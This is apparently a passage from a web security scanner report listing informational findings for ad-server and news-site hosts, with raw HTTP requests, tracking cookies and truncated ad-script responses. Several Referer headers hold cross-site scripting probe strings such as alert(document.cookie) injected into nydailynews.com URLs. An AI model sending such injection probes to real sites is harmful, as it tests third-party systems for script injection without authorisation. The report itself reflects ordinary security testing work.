Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/p.media/aVmN7ESG7Za4mBZapdEOTtQ8YbQ6XrBjXaysSUMGWUY4VdM4mbQpPFZboYEQo5EUi4qY3nEjIYbZbgTdf1m6vZbnc7mpHUJ2qZbh3dAr3A7Gnr3HYVfW1sYV0V7OpT7R3bMWVrnGWmj5QTM4PGUMSdJx1HJxWPrN3s3U0VQuoc5ZbBE/2413746/ad.html/

Request

GET /p.media/aVmN7ESG7Za4mBZapdEOTtQ8YbQ6XrBjXaysSUMGWUY4VdM4mbQpPFZboYEQo5EUi4qY3nEjIYbZbgTdf1m6vZbnc7mpHUJ2qZbh3dAr3A7Gnr3HYVfW1sYV0V7OpT7R3bMWVrnGWmj5QTM4PGUMSdJx1HJxWPrN3s3U0VQuoc5ZbBE/2413746/ad.html/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/p.media/aemNYDXa6MRbBDTUvXVWJ4nrjpQbMm1EZbt4a7l2av5mEJBYbU7UWFTmAMZdpV7optQE5q373deq4mnKmrrKYsfPXcvV1svunab43rFTWUMAUAUVPqb1QsrMQdbN0dbpT6ru4G31XFnZcT6iu46r9Q6nF2Wvp0dBAMTAJxq6YRw/2401306/adTag.html

Request

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 102
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Content-Type: text/html
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 346

<script LANGUAGE="JavaScript1.1"
SRC="http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90?http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15b
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/p.media/agmNQCpTj43UZbSVbMGW673QEYYPVQpSt3N0HZbpT6MN2cr2XFZbLT6Ts4PYcRmMC4dnr1WQAntEu4m3S5GYdUcJlVVMjPP3mUWFWWrj45UauVTboTTQbPEBZdRVZbZaPFavRHMlWc3U5rTnodyqYaqO4WYHPcFH2mJys21cex/2401206/wrapper1.html

Request

GET /p.media/agmNQCpTj43UZbSVbMGW673QEYYPVQpSt3N0HZbpT6MN2cr2XFZbLT6Ts4PYcRmMC4dnr1WQAntEu4m3S5GYdUcJlVVMjPP3mUWFWWrj45UauVTboTTQbPEBZdRVZbZaPFavRHMlWc3U5rTnodyqYaqO4WYHPcFH2mJys21cex/2401206/wrapper1.html HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs11ddd'%3balert(1)//e0aca46f7df/rangers/2011/01/live-chat-wednesday-at-2-pm
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=ahnkZbHm5abw6yuoZbUkT4fqUDUD2sYQZdDZaWW5gcMxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRm7xqnMnbNZckbcJL08tom0uWyJjGe8Zdt6BlH3Zcgcsh0fhhxv3ZaQZcwFXZaO9JVcJ3us2ZdEZbqUeIufqjSpys4WJ0ZcM4syZcjG8Zbft2iGhneSok3ZaDIZdclXCdIhsscZdmH5YsnPfW8trZcsA79tQACk3NTkV13GtqIcPaqt5eZa6M8CABjvZaxZdmQA4c0baAtET1GltZbo81FoGCIhgtCZasZdMN2Jjq106mWnmilvx5UBLq5opOrZbZcOFaY55V1fiX6YxFuxKCmyoNYTDMRkSagDd2m8SCdgsicJZdExmlx1v8BkXZcnSVO7wwTQlALimTf1ubR4BfjMSAZaZblvDXi4cJyPKOlZctjiZc6vBUFwUVAJ5ZdBUubZc14m7BkLGGox6JFEyBTa7rcBXF5kT5Us9stePYaiDRKe6lFIGtKQZaSv3ZbYg87VtNTF9wDkwTVZcSj7

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 102
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Content-Type: text/html
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 389

<IFRAME src="http://a.tribalfusion.com/p.media/a3mNQC36UY5sbbTGFbWGMhSPvwTWYSWrr12UepUqrqVEMcQEBZbSGfZcPritPW7aUcYU5FmxmtirYaqv2WQCPGrZc5AJImdANTdQ70bv61b791EysPbQHTFBYWtUYmFZbxPUfMYqMs4a7k2afYnE7E1Ff
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/p.media/akmN7EWUUSVtB2nrZbuPrrtXEMo4qZbg2afYnaJD1rZbaUWJQmPfJnVYsoHQC2EZbf3dIn4PfGnbMHYcURXsMU0svxmTF42bFVVUBFUAvTPE3RPsZbmSdJr1d7sT6MO2Gv4XbZbLTA6n5AUdQAbK4HQn0dnDmWZaO463Y3rnQqqU3Fp/2413746/ad-cache.html

Request

GET /p.media/akmN7EWUUSVtB2nrZbuPrrtXEMo4qZbg2afYnaJD1rZbaUWJQmPfJnVYsoHQC2EZbf3dIn4PfGnbMHYcURXsMU0svxmTF42bFVVUBFUAvTPE3RPsZbmSdJr1d7sT6MO2Gv4XbZbLTA6n5AUdQAbK4HQn0dnDmWZaO463Y3rnQqqU3Fp/2413746/ad-cache.html HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://assets.nydailynews.com/js/thickbox.jsd2772'%3balert(1)//244e853bb28
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 102
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Content-Type: text/html
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 220

<html>
<head>
</head>
<body>
<TABLE height="100%" cellSpacing=0 cellPadding=0 width="100%" border=0>
<tr><td height="20%"></td>
<TR>
<TD vAlign=center align=middle>

</TR>
</TABL
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/p.media/akmN7EWUUSVtB2nrZbuPrrtXEMo4qZbg2afYnaJD1rZbaUWJQmPfJnVYsoHQC2EZbf3dIn4PfGnbMHYcURXsMU0svxmTF42bFVVUBFUAvTPE3RPsZbmSdJr1d7sT6MO2Gv4XbZbLTA6n5AUdQAbK4HQn0dnDmWZaO463Y3rnQqqU3Fp/2413746/ad-cache.html/

Request

GET /p.media/akmN7EWUUSVtB2nrZbuPrrtXEMo4qZbg2afYnaJD1rZbaUWJQmPfJnVYsoHQC2EZbf3dIn4PfGnbMHYcURXsMU0svxmTF42bFVVUBFUAvTPE3RPsZbmSdJr1d7sT6MO2Gv4XbZbLTA6n5AUdQAbK4HQn0dnDmWZaO463Y3rnQqqU3Fp/2413746/ad-cache.html/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/p.media/akmN7EWUUSVtB2nrZbuPrrtXEMo4qZbg2afYnaJD1rZbaUWJQmPfJnVYsoHQC2EZbf3dIn4PfGnbMHYcURXsMU0svxmTF42bFVVUBFUAvTPE3RPsZbmSdJr1d7sT6MO2Gv4XbZbLTA6n5AUdQAbK4HQn0dnDmWZaO463Y3rnQqqU3Fp/2413746/ad.html/

Request

GET /p.media/akmN7EWUUSVtB2nrZbuPrrtXEMo4qZbg2afYnaJD1rZbaUWJQmPfJnVYsoHQC2EZbf3dIn4PfGnbMHYcURXsMU0svxmTF42bFVVUBFUAvTPE3RPsZbmSdJr1d7sT6MO2Gv4XbZbLTA6n5AUdQAbK4HQn0dnDmWZaO463Y3rnQqqU3Fp/2413746/ad.html/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/p.media/aomN7ET6np2sJ1YUrITPip5Pn6QPrE4WMo1t3LpdEw56nW5cj8Tsn7WcfiPAFwTWMPWFjP3rAwVEUrTaBcPTBZdSsJZbRrEvRdMdUVM54FXuntqo0aqp2tMBSGjA4AnZaoWXqTd36Yrn7XrB9XqepRUvZcTbQ4WtUWosZbAxdcios/2401306/wrapper1.html

Request

GET /p.media/aomN7ET6np2sJ1YUrITPip5Pn6QPrE4WMo1t3LpdEw56nW5cj8Tsn7WcfiPAFwTWMPWFjP3rAwVEUrTaBcPTBZdSsJZbRrEvRdMdUVM54FXuntqo0aqp2tMBSGjA4AnZaoWXqTd36Yrn7XrB9XqepRUvZcTbQ4WtUWosZbAxdcios/2401306/wrapper1.html HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=apnbTgRkP6sAeCnr7aThQZcqPBHtrraZbSTRTZaxKPOHouZaJVIbQTSsBUPqmi4nEtfb83Zcvec3S8iUvCOxoTGpb74mTNHJQwaKvcNy6crTZaEDIyKsscnXKMV6dVS8Cjj39a44AW1RJsMFxcrNOalv5cGbdo53CJ3hSJeZbwgoZdoPQvB5XBWaxBldqc0yx46ZcRTwOnpIEM67ujH5rk8FCBUxUTVho7T8IJUMTYZd0TwwCm3rUsvAfXeyPY3GrFVTMo0OPnkPqLNfy7lucPe6JOaARob4cdJG8W6oycO0gCTFlhcLuNw9jFtSed6uw6r0tHISg1pRvsWAO7MY3Lr2uFxDUtZcyTAckJYAI3d3XPSQriZdEE06yPgwHHqlv652SvRZceLbX88lCpQEtnNoTnYu8efdTYcJkNCsd

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 102
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Content-Type: text/html
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 390

<IFRAME src="http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvT
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html

Request

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 102
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Content-Type: text/html
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 342

<script LANGUAGE="JavaScript1.1"
SRC="http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90?http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX
...[SNIP]...

27.20. http://ad.doubleclick.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/

Request

GET / HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-HttpSvr
Content-Type: text/html
Content-Length: 1175
Last-Modified: Fri, 12 Oct 2007 16:17:37 GMT
Date: Fri, 28 Jan 2011 16:43:21 GMT
Connection: close

<html>
<body bgcolor=#ffffff>
<b>This is a DoubleClick advertising server.</b>
<p><center>
<a href="http://www.doubleclick.com">
Click here for the DoubleClick home page.</a>
<p>
<a href="http:
...[SNIP]...

27.21. http://ad.doubleclick.net/adi/N3093.130430.MINDSETMEDIA/B4053191 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3093.130430.MINDSETMEDIA/B4053191

Request

Response

27.22. http://ad.doubleclick.net/adi/N3671.CentroNetwork/B5159652.2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3671.CentroNetwork/B5159652.2

Request

Response

27.23. http://ad.doubleclick.net/adi/N3740.270604.B3/B5112048 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3740.270604.B3/B5112048

Request

Response

27.24. http://ad.doubleclick.net/adi/N3740.TribalFusion.com/B5132291.17 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3740.TribalFusion.com/B5132291.17

Request

Response

27.25. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3867.270604.B3/B5128597.10

Request

Response

27.26. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3867.270604.B3/B5128597.5

Request

Response

27.27. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3867.270604.B3/B5128597.6

Request

Response

27.28. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3867.270604.B3/B5128597.7

Request

Response

27.29. http://ad.doubleclick.net/adi/N4270.Tribal_Fusion/B5094437.2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4270.Tribal_Fusion/B5094437.2

Request

Response

27.30. http://ad.doubleclick.net/adi/N4319.MSNMEN/B3889285.5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4319.MSNMEN/B3889285.5

Request

Response

27.31. http://ad.doubleclick.net/adi/N4319.MSNMEN/B3889285.6 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4319.MSNMEN/B3889285.6

Request

Response

27.32. http://ad.doubleclick.net/adi/N4319.MSNMEN/B3889285.7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4319.MSNMEN/B3889285.7

Request

Response

27.33. http://ad.doubleclick.net/adi/N4319.msn/B2087123.382 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4319.msn/B2087123.382

Request

Response

27.34. http://ad.doubleclick.net/adi/N4682.132309.BURSTMEDIA/B4421704.7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4682.132309.BURSTMEDIA/B4421704.7

Request

Response

27.35. http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5157804.4 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.152304.TRADEDESK/B5157804.4

Request

Response

27.36. http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5157804.5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.152304.TRADEDESK/B5157804.5

Request

Response

27.37. http://ad.doubleclick.net/adi/N5956.Advertising.com/B3941858.17 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5956.Advertising.com/B3941858.17

Request

Response

27.38. http://ad.doubleclick.net.57389.9231.302br.net/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net.57389.9231.302br.net
Path:	/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7

Request

GET /jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925? HTTP/1.1
Host: ad.doubleclick.net.57389.9231.302br.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

27.39. http://amch.questionmarket.com/adscgen/st.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adscgen/st.php

Request

GET /adscgen/st.php?survey_num=791689&site=57634299&code=39823749&randnum=6941413 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1296062048; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:48:40 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
DL_S: b103.dl
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 165
Content-Type: text/html

(function(){
if(1!=4){
(new Image).src="http://amch.questionmarket.com/adsc/d791689/21/39823749/decide.php?ord="+Math.floor((new Date()).getTime()/1000);

}
})();

27.40. http://assets.nydailynews.com/img/2011/01/26/205x120-gthmb_no_makeup_menounos.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://assets.nydailynews.com
Path:	/img/2011/01/26/205x120-gthmb_no_makeup_menounos.jpg

Request

GET /img/2011/01/26/205x120-gthmb_no_makeup_menounos.jpg HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 Bad Request
Server: Apache
Content-Length: 69
Cneonction: close
Content-Type: text/html
Content-Language: en
Age: 8
Date: Fri, 28 Jan 2011 14:14:30 GMT
Expires: Fri, 28 Jan 2011 14:14:32 GMT
Connection: keep-alive

/apps/web1/apache2/htdocs/img/2011/01/26/gthmb_no_makeup_menounos.jpg

27.41. http://b3.mookie1.com/2/B3DM/DLX/1@x71 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/B3DM/DLX/1@x71

Request

GET /2/B3DM/DLX/1@x71 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23?USNetwork/RS_SELL_2011Q1_TF_CT_728
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; session=1296224086|1296224086

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:14:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 784
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var ZAP_id=cookie_c
...[SNIP]...

27.42. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90

Request

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:58:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 514
Content-Type: text/html

<SCRIPT TYPE="text/javascript" language="JavaScript">
var B3d=new Date();
var B3m=B3d.getTime();
B3d.setTime(B3m+30*24*60*60*1000);
document.cookie="ATTWL=CollectiveB3;expires="+B3d.toGMTString()+";pa
...[SNIP]...

27.43. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/

Request

Response

27.44. http://base.liveperson.net/visitor/addons/deploy.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://base.liveperson.net
Path:	/visitor/addons/deploy.asp

Request

